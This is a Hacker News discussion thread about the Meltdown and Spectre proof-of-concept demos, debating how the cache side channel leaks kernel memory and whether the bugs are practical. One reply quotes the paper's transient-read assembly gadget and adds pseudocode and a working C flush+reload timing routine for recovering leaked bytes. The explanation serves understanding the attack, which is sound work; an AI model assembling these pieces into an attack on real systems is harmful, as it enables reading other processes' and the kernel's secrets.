Can the videos be put on YouTube for convenience?

yuhong 8 years ago

One of the reasons I don't consider the timing attacks that important is that there are often easier ways to bypass ASLR.

revelation 8 years ago

The secret program confirms what others have seen: it's not so much "read any physical memory" as "read memory in cache"

  • K0nserv 8 years ago

    > "read any physical memory" as "read memory in cache"

    You can force values from any memory to affect the cache in a predictable manner which enables you to read all physical memory. See https://news.ycombinator.com/item?id=16108574 or read the paper yourself https://meltdownattack.com/meltdown.pdf

    • revelation 8 years ago

      This is from Google Zero on Meltdown:

      We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

      Not only is L1D tiny, but stuff like prefetch doesn't touch it. So how exactly do you force any memory into L1D cache unless, like in all the examples we have seen, the victim program is pretty much accessing it in a busy loop?

      • K0nserv 8 years ago

        I'll try to explain the small snippet from the paper. The exploit uses a Flush+Reload attack to use the cache as a side channel to leak memory read during speculative execution. They use a 256 * 4096 byte memory region to leak a 1-byte value from any location mapped into the process. 4096 is the page size and is used to make sure the caching doesn't create false positives; apparently accessing data on one page doesn't pull adjacent pages into the cache.

        Here's the example from the paper.

          1: ; rcx = kernel address
          2: ; rbx = probe array
          3: retry:
          4: mov al, byte [rcx] ; Read kernel memory(1 byte) into AL which is the least significant byte of RAX
          5: shl rax, 0xc ; Multiply the collected value by 4096 
          6: jz retry ; Retry in case of zero to reduce noise
          7: mov rbx, qword [rbx + rax] ; Access memory based on the value read on line 4
          8: ; Note: The read on line 4 is illegal, but the CPU speculatively executes line 5-7 before this triggers a fault.
        
        The receiving code then tries to access each of these 256 memory locations and measures the time taken. For one of them the access will be much faster, since that memory is cached, and that location reveals the value read. So if you read the value 84 on line 4, then when you access the value at offset 344064 (0x54000 = 84 * 4096) in your probe memory it will be faster, and you can deduce the read value was 84.

        So in pseudo code the attack is

           start = 0xFFEE // No idea if this is a reasonable start location
           result = []
           offset = 0
           page_size = 4096
           probe_array = malloc(256 * page_size)
        
           loop {
             flush_caches(probe_array)
             read_and_prepare_cache(start + offset * 8, probe_array) // The above assembly
             result.push(determine_read_value(probe_array)) 
             offset += 1
           }
        
        
        There's an extra detail here about recovering from the illegal memory access in a quick way that I've skipped.
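
        For completeness, determine_read_value would be a flush+reload scan over the 256 slots, roughly like this (my sketch, not from the paper; the threshold must be calibrated per machine):

            #include <stdint.h>
            #include <x86intrin.h>   /* __rdtscp */

            #define CACHE_HIT_THRESHOLD 100   /* cycles; an assumption, calibrate locally */

            /* Time a single load with rdtscp. */
            static uint64_t access_time(volatile uint8_t *p) {
                unsigned aux;
                uint64_t t0 = __rdtscp(&aux);
                (void)*p;
                return __rdtscp(&aux) - t0;
            }

            /* The slot that reloads fast is the one the transient code
             * touched; its index is the leaked byte value. */
            static int determine_read_value(volatile uint8_t *probe_array) {
                for (int byte = 0; byte < 256; byte++) {
                    if (access_time(probe_array + byte * 4096) < CACHE_HIT_THRESHOLD)
                        return byte;
                }
                return -1;   /* noise: nothing was cached this round */
            }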

        To answer the parent's question: I believe this only uses a single cache line (64 bytes) since it only accesses a single value.

        This is my understanding anyway, happy to be corrected

    • koolba 8 years ago

      > You can force any memory into the cache so yes it is "read any physical memory".

      Is there a direct method for that or do you mean that you can repeatedly try reading memory addresses until the address that you want to access is actually in the cache prior to your access?

      • K0nserv 8 years ago

        The exploit is based on reading values that you shouldn't be allowed to access in speculative execution and then using the returned values to create persistent changes in the cache (they persist even after the CPU detects your illegal access). Those persistent changes are then read via a side-channel attack.

        So you read any address you want speculatively and then use the result to prime the cache in such a way that you can determine what the value you read speculatively was. This works because modern operating systems map kernel-space addresses into normal processes to make syscalls faster.

        I'd recommend reading the paper[0], it's fascinating stuff.

        [0]: https://meltdownattack.com/meltdown.pdf

      • ctrlrsf 8 years ago

        It doesn’t force memory into cache directly. It determines values of bytes in memory by using the byte as a multiplier to an offset in memory. To determine byte value you can check all the offset combinations to see which was cached. Details in the meltdown paper.

      • tptacek 8 years ago

        The relationship between the attacker and cache is fundamental to the attack; the Meltdown paper does a really good job explaining this.

  • tptacek 8 years ago

    The entire point of the attack is that attackers can coerce targets to predictably load things into cache, which is why you're being downvoted. You should re-read the Meltdown paper; it's very clear (and significantly easier to read than the Project Zero writeup, which is good but goes deep into implementation details).

john_teller02 8 years ago

These two bugs (Meltdown and Spectre) are really very speculative things. It is like when human beings became aware of asteroid orbits, they thought that Earth was in danger of being hit by one. Now that is indeed a theoretical possibility, but what are the chances? These two bugs have existed for 20 years and there are no known exploits of them. In the GitHub demos they also mention that the demos will work only if "For this demo, you either need the direct physical map offset (e.g. from demo #2) or you have to disable KASLR by specifying nokaslr in your kernel command line." - So you basically start with a broken system to exploit these bugs.

  • firethief 8 years ago

    This is literally a PoC. It's too late for the standard "I can't imagine how to exploit this so surely it cannot be done" fallacy. You are looking at an example of how to do it.

  • hannasanarion 8 years ago

    If you don't know the difference between the existence of an earthbound asteroid and the existence of people who write computer viruses, I don't know what to tell you.

  • andylei 8 years ago

    > For this demo, you either need the direct physical map offset (e.g. from demo #2)

    as in, demo #2 is a working exploit to get this map

  • dsfyu404ed 8 years ago

    >These two bugs have been existent for 20 years and there is no known exploits of them.

    They don't exactly leave behind a lot of telltale signs.

    This is also the kind of bug that is so broad (read access to everything on almost any machine you can execute code on) that a large subset of those equipped to discover it would have kept their mouths shut.

    > So you basically start with a broken system to exploit these bugs.

    A lot of systems were broken in the time before KASLR came along

  • voidmain 8 years ago

    Attacks are not asteroids: attackers constantly improve them to bypass improved defenses, and the "improbability" of an attack is no defense. Bypassing KASLR with these attacks is easy and real attackers will do it.

  • abritinthebay 8 years ago

    I think you're being harshly down-voted without people explaining why.

    For a start - this is hardly a remote possibility when we already have proof of concepts like the linked repo.

    Secondly - your analogy makes no sense. The only way to make it make sense is to add that we also know there is an entire spacefaring group of mercenaries whose entire hobby and/or job is deliberately throwing asteroids in Earth's general direction.

    • Skunkleton 8 years ago

      > The only way to make it make sense is add that we also know there is an entire spacefaring group of mercenaries whose entire hobby and/or job is deliberately throwing asteroids in Earths general direction.

      Maybe there is, but they are hilariously incompetent?

      • logfromblammo 8 years ago

        Nah, they're really far away, and there's an accumulated round-off error in their distance conversion between bloits (used by the client) and metrons (used by the subcontractor), so they're shooting at a target a quarter of a light-year away, and won't realize it for another 500 years.

      • abritinthebay 8 years ago

        This sounds like a new BlackAdder pitch...

        "Sir, I have a cunning plan" "Does it involve that legion of rabid space weasels again?" "... maybe."

        • Skunkleton 8 years ago

          As long as I can retire to my great big turnip in the country when it is all over I am happy.

  • philsnow 8 years ago

    you're being downvoted but the first non-trivial program `./kaslr` fetches the physical map offset of the running kernel: https://github.com/IAIK/meltdown/#demo-2-breaking-kaslr-kasl...

    Note they do say

    > This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.

    but I don't know how much allowing it to sudo speeds up the process.
